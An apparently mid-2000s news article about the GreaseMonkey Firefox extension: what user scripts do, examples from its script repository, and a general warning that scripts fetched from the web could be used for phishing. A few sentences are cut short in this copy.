The Mozilla Firefox extension mechanism is a powerful feature; it gives
browser users a great deal of flexibility in controlling how things work.
One of the extensions attracting the most attention in the last few months
. It is, in
fact, a classic example of why free software is a great thing, but also an
illustration of how users can be invited to harm themselves.
The core idea behind GreaseMonkey is simple: it allows the user to
the identified pages (as determined by a regular expression) is loaded, the
script gets a chance to rewrite things before the page is displayed.
GreaseMonkey is, in other words, a mechanism which enables readers to
automatically rework web pages into the form they would have liked them to
be in the first place.
script repository shows that there is a demand for this capability.
Scripts have been posted which:
- Remove articles or comments posted by specific users. Perhaps
this would be a quick way to implement the comment filtering features
occasionally requested for LWN.net.
- Rewrite web pages to get rid of intrusive navigation bars,
interstitial ad pages, etc. For those who want more ads, there is a
script which inserts Google ads into the handful of pages on the net
which do not yet have them.
- Redirect SourceForge download links to skip the mirror selection page
and simply get the requested files.
- Delete Michael Jackson stories from certain news sites
("Best. Userscript. Ever.").
- Rewrite Paul Graham's articles for better readability.
- Create cross links between Netflix and IMDB.
And so on; the list appeared to be growing as this article was being
The operators of various web sites will, beyond doubt, get upset if
GreaseMonkey use takes off. To anybody who wishes to have a high degree of
control over the appearance and use of their site, GreaseMonkey will be a
threat. But GreaseMonkey is a clear expression of software freedom: we
will control how things work on our own computers. Our tools are
written to maximize that control, and there is little that can be done
GreaseMonkey does, however, potentially threaten that control in a
different way. A tool which encourages users to download and run scripts
from random parts of the net would appear to be an open door for security
problems. If the browser's sandboxing works properly, a script should not
be able to affect the system outside of the browser. But even the mere
ability to rewrite HTML is asking for some trouble: how long will it be
until some phisher posts a script that, while perhaps doing something
useful, also redirects links within financial sites? It is not entirely
clear how that sort of problem can be addressed - the same capability which
can redirect all New York Times links to the "printable" version can point
a password submission form to a third-party site.
In other words, while GreaseMonkey is a cool and powerful tool, it should
be used with great care. Install a minimum number of scripts, look them
over first, and, preferably, write them yourself. As the GreaseMonkey
community grows, there will certainly be exploit attempts. Firefox is a
relatively secure web browser; it would be a shame to ruin that by inviting
in random malware from the net.
to post comments)